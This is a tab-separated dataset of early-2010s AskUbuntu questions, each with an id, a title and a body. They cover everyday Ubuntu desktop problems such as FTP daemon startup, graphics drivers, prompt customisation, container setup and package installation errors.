16256	how can i load the `vsftpd` daemon at system-boot , but have it `` start '' in a `` stopped '' state ?	because i only occasionally need to run an ftp server ( vsftpd , in my case ) , i would prefer to just have it fully active only when the need arises . this suggests two possibilities to me , but i do n't know if both ( or either ) are possible.. option 1 : do not start the daemon as the system boots up , but instead , start it manually as the need arises ... but i do n't know the command ( s ) for this ... maybe it is just `` vsftpd '' and it will find its own config file ( s ) ... but would this clash with disabling load-on-boot ? option 2 : . start the daemon as the system boots up , but start it in a stop/waiting mode ... ie . equivalent to sudo stop vsftpd , or sudo initctl stop vsftpd . i would prefer option 1 , because i rarely need an ftp server .
16259	ubuntu wiki refuses to change theme	i 'm attempting to do everything i can in terms of trying to make sure my team 's wiki page looks good , but sadly , i can not seem to activate the new theme ( i 'm stuck using the old one , for some odd reason ) i get the message : this email already belongs to somebody else . whenever i try and change theme ( or other settings ) how do i correct this ?
16268	what 's the best , simplest ocr solution ?	i 'd like to scan a good amount of papers i have lying around , with the least possible hassle . i would like to convert them to images using simple scan , then convert them to text using ocr . is there a good ocr app with a gui that will give me good results at the push of a button ?
16271	how to add nvidia-current drivers into an iso file with remastersys ?	it is necessary to use 3d drivers with unity desktop 11.04 . how can i create my own iso disk to burn it on usb drive for testing unity . i have some problems to test unity in virtual box also default ubuntu disk creator does n't work for me to make usable installation on usb . i am searching the internet without success for how to add files , or - for example - the nvidia-current driver , to an iso . only topics like `` create you own custom distribution '' but those topics do n't fit the content : ) : ( i can not report bugs without possibility to test natty with unity .
16274	what exactly is `` ubuntu desktop edition '' safe mode ?	i 've installed ubuntu 10.10 i386 on an old laptop ( compaz evo n1015v : 1.2ghz cpu , 256m ram ! ) . when attempting to log into desktop edition , nothing is drawn apart from the mouse pointer - the background remains as with gdm , the panel/nautilus do not appear , keyboard shortcuts ( alt+f2 for example ) do not work , etc . `` safe mode '' , however , works fine . i managed to solve this problem by removing compiz , which was a bit of a brute-force solution but did the job for this machine . so one thing that is different between safe mode and normal : compiz is n't started . but what else ? i ca n't find any documentation about `` safe mode '' anywhere . what else does it do differently ?
16275	i am looking for a small ( ubuntu ) open-source-project for which i can code	i have basic c and c++ programming skills as well as a little bit experience with gtkmm and linux-programming in general ( not to forget i have lots of spare time ) . i want to participate in an ubuntu project which is small and not too complex in order to improve my programming sills and of course support ubuntu . can you give me pointers in the right direction and do you know of a project where i could start ?
16277	how to create a bootable usb from a .iso file ?	i am trying to create a bootable usb stick from a .iso image ( it is n't a linux distro or anything of the sort ) intended for use with a cd . i 've tried unetbootin and dd but they do n't boot .
16286	my ubuntuone is broken , what is the problem ?	i am on 10.10 and u1sdtool seems to be completely broken . i reinstalled it , no change . i can add my pc to the account , but it is added twice ( ! ) every time i tried . so i have my netbook and two times my pc in the account . the netbook with 10.04 has no problems . below is the error msg i get when attempting to startup ubuntu one on the command line . desktop : ~ $ u1sdtool -- status oops , an error ocurred : traceback ( most recent call last ) : failure : dbus.exceptions.dbusexception : org.freedesktop.dbus.error.noreply : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . desktop : ~ $ starting it from the me menu has the same effect , the hdd will get really busy for a minute and then nothing happens , the client will not start . nothing in the syslog or anywhere .
16288	command line bittorrent client with udp trackers support	i tried btdownloadcurses and while it works fine for most of the torrents , it seems to trip over ones where udp is employed to track the sources . the messages i am getting are : problem connecting to tracker - ( 'url error ' , 'unknown url type ' , 'udp ' , 'udp : //tracker.openbittorrent.com:80 so are there any other command line clients with udp support ?
16290	right clicking does not work in desktop	when i right-click on my lucid desktop , the context menu does not appear . i mean the menu with options to create a launcher , change desktop background etc . how can i get it to work ?
16293	synapse does n't remember anything	when i was using gnome do , it could remember all applications i use much more frequently , and then it could make a correct suggestion . example : i have applications cheese ( web-cam app , i do n't this much ) and chromium ( browser , i launch new window every 5-10 minutes ) . with gnome-do , when i type `` c '' and then `` h '' , it suggested `` cheese '' only once . later it was suggesting only chromium , even on letter `` c '' , because i 'm using this much more . with synapse i still need to type the whole `` chr '' every time . how do i fix that ?
16299	how can i set a custom icon for a folder ?	some folders in my home directory have special icons . i would like to do something like this with a custom icon for a folder .
16305	how can i make usual phone calls using a connected mobile phone ?	i have ubuntu 10.04 installed as a desktop os and a symbian-based smartphone ( nokia n79 ) . how can i use my desktop system with a headset to make and receive usual mobile phone calls using a connected ( via cable or bluetooth ) smartphone ? thanks .
16306	import videos from panasonic tz 7	does anyone knows a good software which will allow me to import the video i took from my digital camera panasonic tz7 ? shotwell imports photos perfectly from this device . however i could n't find any software which imports the video ( i tried several , among others rapid video downloader ) . the only i could import videos is from nautilus by looking directly for the mts files and then i have to rename the file into something which make sense . if the software could also convert the file into some other format it is a plus , but that i can do that with vlc .
16310	nvidia drivers dual screen xorg.conf	i had dual screen working previously . now every time i try to setup dual screens and reboot . i get logged in as tty mode , i am able to get one screen working , or have my desktop span both screen ( one huge screen ) what i require is two independent screens , that i can drag windows between . this is frustrating , i am sure you can imagine . this issue now is whether or not xorg.conf is used anymore . from my understanding is n't . i would appreciate any help that you guys provide in solving this issue . thanks . edit : here is my xorg.conf generated by the nvidia-settings command , when i select separate screens . http : //pastie.org/1350919
16319	how to use ktorrent ?	can anybody tell me how to use ktorrent ?
16325	is compiz unity 's new flat black/outlined launcher look permanent ?	the new compiz version of unity has a different looking launcher . before it was similar to the ambiance theme used in unity . now it 's flat black with thin little lines around the launcher and icons . mainly , i 'm just wondering if either : devs have n't gotten to adapting or designing the final look of the launcher ( /icons ) . it is an intended change based on someone 's personal aesthetic/design preferences it was a change based on temporary or permanent technical limitations ? other pictures previous mutter unity launcher this is mutter unity launcher in various situations . ( my opinion : you can see how , in a variety of situations , the launch bar fits in with the smooth theme perfectly , and also that the launcher meets up with the ubuntu dash iconfittingly ) current compiz unity launcher this is what it looks like now , flat black with lines around the icons and launcher . ( my opinion : this looks like it belongs to a different style of theme , and when a window is next to it , it looks like two themes are clashing . ) this will look way better when maximized windows share titlebar and menu with the panel . i think even after maximized windows share controls and menu , the smooth look will still always fit better though
16327	how to direct ubuntu to use usb connection for internet	i posted yesterday regarding how to configure easytether on ubuntu . i followed the steps and everything looks good from the terminal . but i am not able to connect to the internet . currently i am connected to a wireless network , i tried disconnecting to it , in hope to connect to internet using my phone but with no help . how do i make my notebook use my cell phone 's connection . i have attached the snapshot from the terminal .
16328	some commands from system menu of panels dissappeared	when i right click with mouse on the panel in the system menu i do n't see all the commands that were before . for example , when i click on the panel i see only two commands : ( 1 ) help and ( 2 ) about the panel . on the applets also there are some commands dissappeared . how to solve this problem ?
16329	no internet access even though the wireless indicator shows 100 %	the problem is , my wireless network connection can not connect . it 's only worked if i plugged in the cable and then used the internet for a while , after being assured that i am connected , i will remove the cable and start using wifi . this works just for a while , but when i restart i will have to do the same thing again . after connected to the wired network , i try to bring my netbook away from the modem , i am still connected if i am nearby to my modem that located upstairs of my house . then if i go downstairs , the connections is fading away but the wireless indicator still indicate 100 % active . downstairs , i ca n't access the internet at all even though the indicator shows 100 % . if i want to connect to the internet again , i have to go upstairs , put in the cable in again and again . this trouble 's really exhausting me . what is the problem ?
16331	window theming not working	i 've dual monitors ( 1920x1080 + 1920x1200 ) running on a nvidia geforce 9800 gt . this is a fresh ubuntu 10.10 install running the default ambiance theme . i 'm finding that the theme fails to load on any of the panel or window decorations resulting in the standard gtk grey . the window boarders however are fine . this occurs on all themes i 've tried , i 've also tried erasing all my profile settings and it still occurs ( via creating a new user ) . please see screenshot : can anyone point me to either a bug number or a fix for this please ? thanks
16332	how do i use xplanet ?	i tried installing xplanet today , but when i run the application , nothing happens . i had it running some years ago and i remember that maybe i have to convince the ubuntu desktop manager to accept the drawn wallpaper from another application , but do n't know how i can set this in ubuntu now . any advice or urls for me ?
16336	how to get coloured terminal over ssh ?	when i connect over ssh to remote hosts everything is just a single font/color . i would like to have colours like i do locally e.g . green for executable and blue for symlinks etc . and such that when i run $ git diff on the ssh host it shows me diff with colours = )
16338	how to remove flickering green lines on screen ?	i 've been using ubuntu 10.10 on my hp pavilion dv4-1430us notebook . for some time now , i 've been getting these thin green flickering lines at the bottom of my screen . and i 've no clue as to what 's causing this problem : hardware , battery or graphics card . i even tried `` nomodeset '' as suggested in some forums , but it was n't of any help . i 'm looking for a way to get rid of this problem .
16345	translating .deb package information	how can i translate the contents of debian/control in debian packages so that the information will be localised when the package is shown in the software-centre ? for packages in ubuntu for single .deb packages for packages in ppas
16348	django based blog	is there a django based blog available on the repositories of ubuntu ?
16356	opening images sorted by modification date/size/type/etc	suppose i have a folder with pictures in them . if i sort them by name once i open one with image viewer and navigate to the others the order is respected . but if i sort my files by modification date , for example , i ca n't do that . basically , the default image viewer only lets you navigate images by name . according to this post on the ubuntuforums this has been an issue since 2007 ! is there a good/easy way to fix it ? seems like such a trivial thing to me .
16357	auto indentation in gedit	i 'm using gedit to program c and cpp , and i 've enabled auto indentation in edit- > pref . however , it still does n't work . is there anything i can do ?
16361	how to hide bottom panel in gnome ?	i want to hide bottom panel so that i would be able to show it again when i want . in the properties menu of the panel there is an option for autohide but not hide totally . the reason i need it , is because i am using docky panel and it now it is behind the bottom panel and looks like awful . what i am doing right now is i am deleting it totally by right clicking on the panel . and the only way i know to return it back is executing following command in the terminal . rm -r ~/.gconf/apps/panel any other solutions ?
16366	what 's the difference between a long term support release and a normal release ?	what are the differences between an ubuntu long term support release ( lts ) and a normal release ?
16371	how do i disable x at boot time so that the system boots in text mode ?	is it possible to disable x at boot time ? i 'm setting up a server so it would be nice if it would n't load the graphical interface every time i boot .
16376	connect to network before user login	as a learning experiment , i 'm trying to turn ubuntu desktop into a server . i was able to disable x at boot time and now , i am trying to get my computer to connect to my wifi network at boot time , before any user logs in . that way , i wo n't have to be physically near my computer every time it reboots . i 've set up the wifi connection using the network manager if that can help somehow ( would be nice not having to reconfigure it again ! ) .
16380	how can i edit the gnome-panel `` places '' menu ?	how can i edit the gnome-panel `` places '' menu ? ( i have the same ssh server showing twice and it 's annoying . ) edit : more precisely , how can i remove the servers i added through `` places / connect to server ... '' edit 2 : here 's a screenshot of my nautilus showing the duplicate servers . by the way , i just realized those have nothing to do with the `` places / connect to server ... '' feature :
16381	enable/install ati x1250	i want to install my ati x1250 on my ubuntu 10.10 , i am running it on a hp 6515b . but when i run aticonfig it says adapter missing , even when i try to edit 3d settings , it says no mardware detected . so the open source drivers are not working perhaps .
16384	how to change forecolor of software center descriptions ?	due to some change i did to the system which i can not remember , the text in my software center is no longer visible ( the description , version , etc of the software ) . it shows when i highlight on where the text should be . so apparently the forecolor of the text has changed to white which is same as the background color . how can i change this ?
16386	is there any software that will do face recognition in photos ?	i would like to automate the process of tagging my photos with subjects ' names . is there any software for ubuntu that can perform face recognition on a local photo collection ?
16388	nice network diagram editor ?	writing a commercial proposal , i want to create a nice graphic showing the clients the architecture i thought of for their it network , with servers , network connections , firewall , load-balancing , etc . for years i have been using dia , but i am tired of it because : the results are not satisfying , very few network elements are available , and each element 's graphic representation is really ugly . question : how to create nice network diagrams ? if a better set of elements was available for dia , that would be a solution .
16393	search launchpad for ppas matching software or package name ?	is there a way to search though launchpad 's ppas for a certain package name ? for instance if i was looking for ppas with firefox packages i could search for `` firefox '' and retrieve a list of all the ppas which contain a firefox package .
16398	me menu disappeared	i am running ubuntu 10.10 with the indicator applet complete . however on logging in today morning , i find that the me menu has disappeared . i removed the indicators completely from the panel and then added it again however i ca n't get the me menu back . all the other indicators like sound , mail work perfectly . however the indicator applet session is missing the me menu . any ideas why this might happen ? i did not update any indicators recently .
16399	how to tell which physcal drive is sdc ?	i have a computer with several drives in it , all identical , all part of a raid . one of those drives is failing ( sdc ) , but i ca n't tell which physical drive is sdc ... any suggestions ?
16403	how to get ubuntu membership ?	what are the steps that i want to follow to get ubuntu membership ? i know contribution is the only mantra to get ubuntu membership . i am not good in programming so what are other ways to contribute to the ubuntu community to get membership ?
16407	control keys produce ascii output in vi insert mode	when i enter mode in vim , all control keys ( like arrow keys , delete keys etc . ) produce characters instead of expected control behaviour . how can i change this ? thanks : )
16408	stack applet was not starting automatically	i am using stackapplet v1.4 it 's not getting started automatically.every time i want to start it manually from application > > accessories > > stackapplet.i am sure i have enabled the option start stackapplet during login but it 's not working.what 's going wrong here ? ~/.xsession-errors shows the following result .
16418	no audio after running lennart poettering 's multitasking script	for some odd reason , after running this and restarting i lost audio on my linux partition ( but not on my windows one ) . with the volume controller appearing at max , why would i have no audio ?
16421	displaying colors in the prompt	how to display my prompt in color ? i see a lot of text go up my screen , and a lot of crud . something like ( red ) myname ( red ) @ ( blue ) mymachine : ~ $ ( blue ) would help simplify things a lot . much appreciated .
16423	how to organize the nautilus bookmarks in the `` places '' panel applet ?	their seems to be no configuration dialog for the `` places '' menue in the panel . yes , i know how to add , remove or change the order of the bookmarks in nautilus . but i want to use folders and subfolders for the bookmarks . with more than 20 entries the nautilus bookmarks and the places menue become inconvenient . any editor for this ? any configuration file that does the job ? any other tool than the standard places menue ? any extension for nautilus to extend the bookmark organization ? thx for reading , p .
16424	displaying a new line on the prompt	i wish to add a new line on every prompt . instead of the cursor showing on the line as name @ machine : ~ $ _ , i want it to be on the next line , like as : name @ machine : ~ $ _ thanks .
16428	showing a `` cowsay '' fortune in every new terminal session	i wish to display a cowsay message in every terminal window . the command i use is fortune | cowsay any ideas how to make it appear whenever i start a new terminal session ?
16431	putting an arbitrary gtk.widget into an appindicator.indicator	putting any gtk.widget inside a gtk.menu works , somewhat , by putting an empty gtk.menuitem in first . it does n't seem to be reliable - but it basically works . with an appindicator.indicator , it does n't work . the entry just stays empty . even if you set the child [ border_size ] to 32 , for example . the only widget that works is a gtk.label ( plus the menuitem , imagemenuitem and so on of course ) . now the me menu has got a gtk.entry in it , so it must surely be possible to do this properly . how do i do it ? here 's some example code to explain what i 'm on about : self.item = gtk.menuitem ( ) self.item.add ( gtk.label ( `` hello world ! '' ) ) self.menu.append ( self.item ) the above code works , this however does n't : self.item = gtk.menuitem ( ) self.item.add ( gtk.entry ( ) ) self.menu.append ( self.item ) where self.menu is an appindicator.indicator , if it were a gtk.menu , the entry would be at least displayed . here 's some working code : import gtk import appindicator class appindicator ( object ) : def __init__ ( self ) : self.ind = appindicator.indicator ( `` hello world client '' , `` distributor-logo '' , appindicator.category_application_status ) self.ind.set_status ( appindicator.status_active ) self.menu = gtk.menu ( ) item = gtk.menuitem ( ) item.add ( gtk.label ( `` hello world '' ) ) # item.add ( gtk.entry ( ) ) self.menu.append ( item ) self.menu.show_all ( ) self.ind.set_menu ( self.menu ) indicator = appindicator ( ) gtk.main ( )
16433	ubuntu on shuttle xs35	what ubuntu features do and which do not work on your shuttle xs35 barebone mini-pc ? in the spirit of this question , add your experience , good or bad , with this fanless , i.e . passively cooled , small-form-factor computer , based on intel 's atom , to this community wiki .
16442	safe way to rename my computer/hostname ?	i 'd like to rename my computer . what 's the recommended way to do this ? is there anything likely to break after i rename it ?
16446	how to get my software into ubuntu ?	as a developer of free software , i want to get my application into ubuntu . should i provide a source tarball and ask for packaging ? or should i create a package myself ? should i target ubuntu directly , or should i try to get into debian and then into ubuntu automatically ?
16450	better drivers for sis 650/740 integrated video ?	i installed xubuntu 10.10 on an old box today and the graphical performance is horrid . according to lspci , the video card is this : 01:00.0 vga compatible controller : silicon integrated systems [ sis ] 65x/m650/740 pci/agp vga display adapter ( prog-if 00 [ vga controller ] ) subsystem : asustek computer inc. device 8081 flags : 66mhz , medium devsel , irq 11 bist result : 00 memory at f0000000 ( 32-bit , prefetchable ) [ size=128m ] memory at e7800000 ( 32-bit , non-prefetchable ) [ size=128k ] i/o ports at d800 [ size=128 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel modules : sisfb is there a way to make it faster ? alternative drivers ? the additional drivers tool shows nothing . i 'm specifically interested in improving java 's java2d rendering speed , because i 'll be running a `` stat screen '' written in that language on it .
16453	how do i migrate from systray to appindicators ?	i am considering forking parcellite and making it use appindicators now that ubuntu has dropped support for systray . how different are these , and are there any `` getting started '' guides on appindicators yet ?
16458	multitouch screen needs two touch points	so , i got a netbook ( some weird china brand ) and it has a multitouch screen . i got to installing ubuntu netbook 10.10 and i used the mouse and keyboard for that . when i wanted to try the touchscreen , at first it did n't seem to work , then i tried to multitouch , and this is what happens : i put my finger on point a i put my finger on point b , while still holding point a . the cursor now jumps to the location on the screen where point a is touched . i can now use point a to drag the cursor only when holding point b. i can use point b for clicking by tapping , but only when holding point a at the place i want to click . what is going on ?
16462	empathy chat limits the number of contacts displayed ?	i 'm using empathy chat with these accounts : gtalk & facebook . i just noticed now that from my gtalk friends only 6 appear online ( including me ) and in reality online are 14 ( checked on gmail ) . and from facebook it displays 44 . so is empathy chat limited to display only 50 contacts ? i looked through the settings and did n't see anything like this : | the worst part is that i have 1 gtalk contact as favorite and it 's not in the list ... is it a bug ? ps : i 'm using ubuntu 10.10
16463	debootstrap or virt-install ubuntu server maverick fails	oki so running any kind of variation of debootsrap i get the following error i : extracting zlib1g ... w : failure trying to run : chroot /lxc/iso/dodo mount -t proc proc /proc debootstrap.log : mount : permission denied if i manualy chroot into the directory then i get promted with : id : can not find name for group id 0 i have no name ! @ ... # i tryed addgroup but it 's not installed , apt-get/aptitude : command not found , so i ca n't do anything with it . i 've tryed ubuntu-vm-builder but since it 's calling debootstrap i get the same error . played with it for a few days and then i stoped and gaved virt-install a try , everithing works till i get to the console to finish the install witch shows only : escape character is ^ ] and nothing more , no matter what i type . so basicly what i 'm trying to do is build a usable chroot system so i can use it with lxc or libvirt . what are my options to get containers/virtualisation up and running ? i 've read somewhere that i can use openvz templates with lxc or libvirt ? but how ? let me know if you need aditional info ( p.s . doing all this on a dedicated server so i ca n't access it by hand , only ssh , plus on my local pc running ubuntu desktop maverick everithing works ) . edit getting closer , i managed to understand how to use an openvz template with lxc , now the problem comes with the network bridge lxc-start : invalid interface name : br0 # use same bridge device used in your controlling host setup lxc-start : failed to process 'lxc.network.link = br0 # use same bridge device used in your controlling host setup ' lxc-start : failed to read configuration file i followed the exact steps to create a bridge and lxc conf looks like : lxc.network.type = veth lxc.network.flags = up lxc.network.link = br0 # use same bridge device used in your controlling host setup lxc.network.hwaddr = { a1 : b2 : c3 : d4 : e5 : f6 } # as appropiate ( line only needed if you wish to dhcp later ) lxc.network.ipv4 = { 10.0.0.100 } # ( use 0.0.0.0 if you wish to dhcp later ) lxc.network.name = eth0 # could likely be whatever you want since it 's not working i know smth is wrong so could somebody guyde me ? edit , looks like the base install was using an custom kernel ( bzimage-2.6.34.6-xxxx-grs-ipv6-65 ) for witch you i did n't found the headers , i did a update-grub after i installed a new kernel , edited menu.lst and no it 's using 2.6.35-23-server and now debootstrap is working just fine same as ubuntu-vm-builder .
16464	how can i run gedit with a different configuration	i want to use gedit as a programming ide and as a regular text editor . would i be able to make some .desktop file to load a different configuration ?
16466	apple g4 733mhz and 512mb ram ... any suggestions on what to use for good performance ?	i 'd like to install ubuntu on this little g4 i 've found ... i hope to get a better performance than os x 10.4 , is it possible ? i thought about using a server minimal install and then put on it gnome , xfce , lxde and fluxbox to find out the best user experience / performance ratio . any ideas or experiences about such kind of g4 ?
16473	migrating from mac to ubuntu , what will i miss ?	this is my first question ( in askubuntu ) . i 'm about to try ubuntu for the first time ( first time to take it seriously actually ) . i love my mac but do n't want to be closed minded , nor closed source ; ) so , if i go ahead with this change , where would you say i would feel the difference ? pitfalls of ubuntu compared to mac ? ( honestly ) what will i miss the most ? thanks in advance ! ! related : difference between mac os and linux
16477	roll-your-own mysql-server ( .deb ) files and mysql root password	i know i can make my own .deb files of an installation . however , during a normal mysql-server install , the root password gets asked for and we need to do a 1-click rollout without any interaction . it needs to install and set the root password . can i `` roll-my-own '' mysql-server.deb and have the package that i roll set the root password ? articles i am reviewing are : http : //www.debian-administration.org/articles/336 http : //www.debian-administration.org/articles/20 for now , i just need to know if this is possible . thank you for your time .
16480	inverted mouse axis on a ubuntu live usb	i have an ubuntu live usb and i was looking for xorg.conf so i could insert an option `` invx '' `` on '' within it ( i am not quite sure how that works exactly yet ) . xorg.conf does not exist in its normal place on the live usb/cd . where can i easily and permanently make this change ? background : i am running ubuntu on a kiosk machine where mouse movement works like a touch screen ( sort of ) .
16485	disable touchpad hardware buttons	i 'd like to disable hardware buttons on the synaptic touchpad , but still be able to use the touchpand and `` tap '' -click on its surface . i do n't find the related options in the output of synclient -l. note that i do n't want to disable the touchpad completely . only to make it ignore the hardware buttons , but still respond to taps .
16494	upgrade manager wants me to do a partial upgrade	so here is my story ... i was doing upgrades to ubuntu the other day , and the power went out right in the middle of the upgrade , so now when i try to do upgrades it keeps asking me if i want to do a partial upgrade . i have heard this is bad and should be avoided , i also know there is a way to fix this via the command line , but i ca n't remember how , nor can i find anything on the internet . any help would be appreciated . thanks
16501	find projects that use a particular programming language in launchpad ?	on launchpad.net , most projects list the programming language ( s ) their software uses : it would be useful if there was a way to get a list of all the projects that use `` x '' programming language , in my case vala . does launchpad provide this functionality ? are there any 3rd party tools that can do this ?
16505	very long gnome login time	my machine is taking ages to get from the login screen after booting to actually showing the gnome desktop ( as in , over a minute ) . it seems as though it is just waiting for a long period of that time . this has been a problem for a long time . the bootchart is available - any ideas on what is causing this ? ( also on superuser )
16508	`` hardware drivers '' item missing from menu	i just installed the newest version of ubuntu ( 10.10 ) and i am trying to get the appropriate drivers installed for the nvidia ion . however there is no system > administration > hardware drivers option in the toolbar . does this not exist in this version of ubuntu ? do you know of any good links to installing the right drivers for the nvidia ion on ubuntu ? thanks in advance !
16513	my thinkpad shut-off when docking	occasionally when i dock my thinkpad ( t60 ) , it shut-off immediately , like someone unplugged its battery . it is not a regular `` shut down '' done by the os - it is like a hardware/driver issue . i 'm using ubuntu 10.10 32 bit . here is the output of lspci 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:01.0 pci bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express pci express root port ( rev 03 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation n10/ich 7 family pci express port 2 ( rev 02 ) 00:1c.2 pci bridge : intel corporation n10/ich 7 family pci express port 3 ( rev 02 ) 00:1c.3 pci bridge : intel corporation n10/ich 7 family pci express port 4 ( rev 02 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7 family ) sata ide controller ( rev 02 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 02 ) 01:00.0 vga compatible controller : ati technologies inc radeon mobility x1400 02:00.0 ethernet controller : intel corporation 82573l gigabit ethernet controller 03:00.0 network controller : intel corporation pro/wireless 3945abg [ golan ] network connection ( rev 02 ) 15:00.0 cardbus bridge : texas instruments pci1510 pc card cardbus controller any hint ? -- yonatan
16514	windows version of ubuntu one staying ?	i am wondering if there will definitely be a windows version of ubuntu one after the beta ? because otherwise i will not bother getting a 20gb plan as i dont use ubuntu on any pc .
16517	desktop feed reader which can sync with google reader	i am looking for a desktop feed reader which can sync with google reader and sits in the messaging menu and give desktop notifications . it should be like , when i have marked an item as 'read ' on greader then the desktop feed reader should also know that the item has been read . i have tried liferea but it is not integrating into the messaging menu :
16521	where in the filesystem should i store shared data ?	where in the unix filesystem is the conventional location to save non-user specific data , for example data shared via nfs or ftp , or backups ? i could obviously create and use any arbitrary folder ( such as /home/shared , /data or /var/data ) , but i 'm really wondering if there are any `` best '' or `` common '' practice guidelines . the filesystem hierarchy standard does n't specify a location for shared data . for backups , i tend to use /var/backups , but as several cronjobs write to it should it really be left for their use ?
16528	is there one file that all desktop managers ( gnome , kde , xfce and etc ) are required to read/execute when users login ?	i use gnome and it first executes commands from /etc/profile and then from ~/.profile . this i have found by putting statements like echo 'something ' > test in all files that i could think of like .bashrc , .bash_profile , .profile , /etc/profile and others . what i am curious about is to know if there is any standard file that all desktop managers are required to execute commands from ? is there any agreement between desktop mangers in this regard or do they use which ever file they want .
16531	how do i make gvim use the icon in my icon theme ?	instead of my pretty faenza icon , it 's using a rather ugly one .
16535	installing axel ?	how do i install axel on natty narwhal ? i tried sudo apt-get install axel but it came back with this : james @ james-ubuntu-11-04 : ~ $ sudo apt-get install axel [ sudo ] password for james : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package axel james @ james-ubuntu-11-04 : ~ $ does anyone have any ideas ?
16540	usb key will only be mounted by gparted [ ? ]	when i insert by usb key nothing happens ( i.e . the drive is not visible ) . i can mount the usb drive from gparted though ( and then it 's suddenly recognized ) . it 's not particular to any usb key . this only happens on my laptop ( on the desktop the same key will be mounted upon plugging it in without any problems ) . finally , the key is formated as fat32 and dosfstools and mtools are installed ( through gparted claims otherwise ) . what 's the catch ? edit also , gparted offers me the option to mount the key on `` / '' : should n't that be `` /media '' ( or has this changed ? )
16544	trouble installing gnome-activity-journal	the following happens after attempting to run gnome-activity-journal ( from a purge then reinstall ) $ gnome-activity-journal & [ 1 ] 5252 $ /usr/share/themes/orta/gtk-2.0/styles/panel/panel-dark-default.rc:20 : unable to locate image file in pixmap_path : `` /panel/panel-dark.png '' ** message : pygobject_register_sinkfunc is deprecated ( gstobject ) traceback ( most recent call last ) : file `` /usr/bin/gnome-activity-journal '' , line 94 , in < module > from src.main import portalwindow file `` /usr/share/gnome-activity-journal/src/main.py '' , line 30 , in < module > from activity_widgets import multiviewcontainer , timelineviewcontainer , thumbviewcontainer file `` /usr/share/gnome-activity-journal/src/activity_widgets.py '' , line 35 , in < module > from store import contentstruct , client file `` /usr/share/gnome-activity-journal/src/store.py '' , line 504 , in < module > store = store ( ) file `` /usr/share/gnome-activity-journal/src/store.py '' , line 367 , in __init__ days_population = zeitgeistdbusinterface ( ) .get_extension ( `` log '' , `` journal/activity '' ) .gethistogramdata ( ) file `` /usr/lib/pymodules/python2.6/zeitgeist/client.py '' , line 83 , in __getattr__ raise typeerror ( `` unknown method name : % s '' % name ) typeerror : unknown method name : gethistogramdata i 'm going to assume that the panel image missing error is irrelevant ( i deleted it so that i can have a transparent panel ) . anyway , i 'm curious if there is a way i can resolve these errors so i can actually run gnome-activity-journal . edit : this is from installing gnome-activity-journal- unpacking gnome-activity-journal ( from ... /gnome-activity-journal_0.5.0.1-0ubuntu1_all.deb ) ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for python-gmenu ... rebuilding /usr/share/applications/desktop.en_us.utf8.cache ... processing triggers for desktop-file-utils ... processing triggers for hicolor-icon-theme ... gtk-update-icon-cache : the generated cache was invalid . warning : icon cache generation failed processing triggers for man-db ... processing triggers for gconf2 ... processing triggers for python-support ... setting up gnome-activity-journal ( 0.5.0.1-0ubuntu1 ) ... processing triggers for python-support ...
16546	how can i view the complete changelog for a ppa package ?	when i am viewing a ppa in launchpad , the `` package details '' view shows me the most recent change from the changelog . is there a way to view the entire changelog for a source package in a ppa without downloading the package ? the package browser allows changelog downloads for distribution packages . it would be quite helpful if i could do this for ppa packages as well .
16548	what is the best video software that can play more than one instance besides gnome mplayer ?	what is the best video software that can play more than one instance besides gnome mplayer ? i 'm tired of using gnome mplayer that always creates a pop out dialog about “failed to open vdpau backend libvdpau_nvidia.so” everytime i play my videos with it .
16549	where can i find a netbeans nightly build ?	is there any chance to install nightly netbeans via apt ? i 'd like to get daily updates to newest versions . any ppa ?
16551	ubuntu root user	hi folks , i have been getting hands on ubuntu and really liking it . though someone of the terms really confuse me . one such confusion is : `` just remember , when sudo asks for a password , it needs your user password , and not the root account password '' . on my system i remember i just have one password and i never configured two passwords . so how do i find my root account password ?
16556	embed ubuntu font on any web page	considering licences like : http : //font.ubuntu.com/ufl/faq.html how can i use ubuntu font family on any website without making user to install it ? any chance of using it with tools like : http : //code.google.com/intl/en-us/apis/webfonts/
16562	no init start up error	i 'm running ubuntu on a dual boot with windows vista , i 've just gone to boot up as usual in to ubuntu and i have this error no init found . try passing init= bootarg . busybox v1.15.3 ( ubuntu 1:1.15.3-1ubuntu5 ) built-in shell enter 'help ' for a list of built-in commands . ( initramfs ) this happens after i select ubuntu from the grub menu , any help would be great . : )
16568	prism equivalent for chromium ?	i want to use prism , but i do n't want to use firefox . is there some similiar technology to prism , based on chromium instead of firefox ? thanx for your answers
16571	is there a microcontroller kit that ships with development tools for ubuntu ?	i was looking around on the web for an introductory kit with a usb-based microcontroller that i could get started on . however , most of the tools i looked at were windows-only . are there any kits designed for ubuntu ? ( or at least designed for linux that are known to work well in ubuntu . )
16572	how do i install tweetdeck ?	see question here : =============== > http : //superuser.com/questions/218868/tweetdeck-adobe-air-on-ubuntu-10-10 getting the issue : sudo apt-get install reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : tweetdeckfast.fff259dc0ce2657847bbb4aff0e62062efc56543.1 : predepends : adobeair ( > = 1.5.3.0 ) but it is not installable e : unmet dependencies . try using -f .
